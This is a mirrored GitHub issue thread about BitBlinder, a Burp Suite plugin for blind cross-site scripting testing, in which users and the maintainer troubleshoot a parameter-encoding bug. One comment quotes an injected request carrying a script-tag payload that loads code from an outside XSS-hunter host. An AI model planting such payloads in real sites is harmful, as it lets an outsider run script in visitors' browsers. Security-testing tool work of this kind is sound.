GithubHelp home page GithubHelp logo

Comments (7)

BitTheByte avatar BitTheByte commented on July 4, 2024

Hi @lacroutelacroute

Sorry for the delay. Could you please answer the following:-

  • What's your operation system?
  • What's your burpsuite's version?
  • Are you using burpsuite paid or the community edition?
  • Is there any errors showing up?

And if possible please screenshot your problem

from bitblinder.

lacroutelacroute avatar lacroutelacroute commented on July 4, 2024

from bitblinder.

BitTheByte avatar BitTheByte commented on July 4, 2024

For the testing I suggest running a python server and test the plugin

$ python -m SimpleHTTPServer 80

Then edit your hosts file to point domain name to the localhost

127.0.0.1        local.domain

Using your browser navigate to http://local.domain?test=1234&foo=var you should notice the traffic that being sent from the plugin at terminal

As for the issue with the config file I'll roll up a fresh kail image in order for me the recreate the issue because all my previous tests were on windows, I'll keep you updated

from bitblinder.

lacroutelacroute avatar lacroutelacroute commented on July 4, 2024

from bitblinder.

ehsandeep avatar ehsandeep commented on July 4, 2024

Hi @BitTheByte,

Same problem, and here is what I've experienced as of now:-

Let's say we have a page with parameter res www.site.com?res=test, BitBlinder make GET request like this.

www.site.com?res="><script&blinder_ignore_request=yes src=https://x.xss.ht></script>

from bitblinder.

BitTheByte avatar BitTheByte commented on July 4, 2024

Thanks @bauthard and @lacroutelacroute for pointing out on this. This problem is due to missing encoding on the space character. Weird enough burp-suite interpreted the space as a new parameter which introduced this problem.

I published a temporarily fix for the issue fd433ff let me know if the problem continues or if any variants of it is showing up

from bitblinder.

BitTheByte avatar BitTheByte commented on July 4, 2024

Closed for inactivity, feel free to reopen this again if needed

from bitblinder.

Related Issues (4)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.